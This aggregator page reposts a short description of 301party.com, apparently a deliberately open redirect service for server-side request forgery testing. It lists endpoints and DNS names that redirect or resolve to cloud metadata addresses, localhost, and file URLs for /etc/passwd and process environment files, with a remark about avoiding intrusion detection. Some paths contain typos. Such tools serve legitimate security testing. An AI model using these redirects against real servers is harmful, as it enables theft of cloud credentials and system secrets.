301party.com: The Intentionally Open Redirect

3 months ago 3

301party.com: the intentionally open redirect

Example usage:
  • /redirect?url=https://example.com&type=302
  • /{301,302,303,307,308}?url=http://example.com
  • /metadata: shortcut for /redirect?url=http://169.254.169.254/latest/meta-data/
  • /metadata6: shortcut for /redirct?url=http://[fd00:ec2::254]/latest/meta-data/
  • /localhost: shortcut for /redirect?url=http://127.0.0.1
  • /zeroes: shortcut for /redirct?url=http://0.0.0.0
  • /passwd: shortcut for /redirect?url=file:////etc/passwd
  • /services: shortcut for /redirct?url=file:///etc/services (avoid IDS maybe...)
  • /environ: shortcut for /redirect?url=file:///self/proc/environ

Bonus DNS records!

  • localhost.301party.com: 127.0.0.1
  • metadata.301party.com: 169.254.169.254
  • ipv6.metadata.301party.com: [::169.254.169.254]

DIY

Read Entire Article
  1. Homepage
  2. Technology
  3. 301party.com: The Intentionally Open Redirect

Related

Reselling tickets for profit to be outlawed in UK government crackdown

Reselling tickets for profit to be outlawed in UK government...

22 minutes ago 0
Verifiability

Verifiability

22 minutes ago 0
Show HN: jsrun – Isolated JavaScript Runtime in Python via Embedded V8

Show HN: jsrun – Isolated JavaScript Runtime in Python via E...

23 minutes ago 0
Hostinger Web Hosting